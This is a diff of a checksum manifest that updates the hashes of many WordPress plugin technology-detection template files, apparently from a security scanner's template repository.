-http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 -http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 -http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 -http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 -http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:6b829502bedd78aae545f30777fe1f110f16a7ad -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4ea09b17d82c48189149274385a07113cf6c77f6 -http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b -http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b -http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 -http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:2c6eb5a2958fa71c5f9b9f3c9cc3f923957ae653 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 -http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 -http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb -http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c -http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 -http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 -http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b -http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 -http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e -http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c -http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 -http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 -http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 -http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 -http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b -http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea -http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d -http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd -http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f -http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 -http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 -http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e -http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 -http/technologies/wordpress/plugins/ml-slider.yaml:02dff647f100193d671151fb1e67b2f5ddcc8a53 -http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f -http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 -http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 -http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 -http/technologies/wordpress/plugins/otter-blocks.yaml:323522fa2b0c8af98838b2347a51f91ceefc2067 -http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 -http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 -http/technologies/wordpress/plugins/photo-gallery.yaml:382590e69485fae675191962251cb3c5bd385aba +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab +http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 +http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 +http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e +http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba +http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d +http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 +http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 +http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca +http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:8f722e7fd4d82c5a072583269575be55ab6d3124 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d43e8f2af19c16d5e9d768be20676774bb14653f +http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 +http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc +http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 +http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 +http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 +http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 +http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 +http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 +http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 +http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b +http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f +http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde +http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a +http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac +http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 +http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 +http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b +http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 +http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 +http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 +http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb +http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 +http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 +http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd +http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb +http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 +http/technologies/wordpress/plugins/ml-slider.yaml:3a91387c9a73aa27dcfe61ae0f6c73803d90410a +http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf +http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 +http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 +http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af +http/technologies/wordpress/plugins/otter-blocks.yaml:dd77f96680874688c4f833694d8282493a4b3ba8 +http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 +http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 +http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f -http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 -http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a -http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa -http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da -http/technologies/wordpress/plugins/post-types-order.yaml:f79cb83aa5e58f0845684ed7d79839a99080bcea -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 -http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad -http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 -http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 -http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 -http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf -http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:db7d02819167f56a4ad9747b0f63648c9c1c787c -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 +http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c +http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d +http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 +http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e +http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 +http/technologies/wordpress/plugins/post-types-order.yaml:ac4e48bb51998b2fb77e25135e3a34ccd1ff5bb3 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 +http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 +http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 +http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 +http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd +http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 +http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:0869b92e5fc5980a1d9af28e866cba52048985d7 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 -http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da +http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd +http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f -http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 -http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa -http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 -http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 -http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 -http/technologies/wordpress/plugins/under-construction-page.yaml:cab0384d64d3d0621ab71655e8ad6c30b862de74 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 +http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc +http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b +http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 +http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a +http/technologies/wordpress/plugins/under-construction-page.yaml:262bf6f78177ba5b569e23f498beeef8f35cc453 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:60fe37dcc4096c4f3780d83c361552fec4a0bccb -http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd -http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 -http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 -http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:d4e216da24359b39cc1229c175f3645fb166139e -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee -http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba -http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 +http/technologies/wordpress/plugins/updraftplus.yaml:581d99c9e67beb70a5e5c360d55e56a4f0e55619 +http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 +http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e +http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 +http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3cee84059c9924bec0e4c4a42c30618ce4bcf6b6 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 +http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 +http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 -http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 -http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 -http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded -http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 -http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 -http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad -http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 -http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f -http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 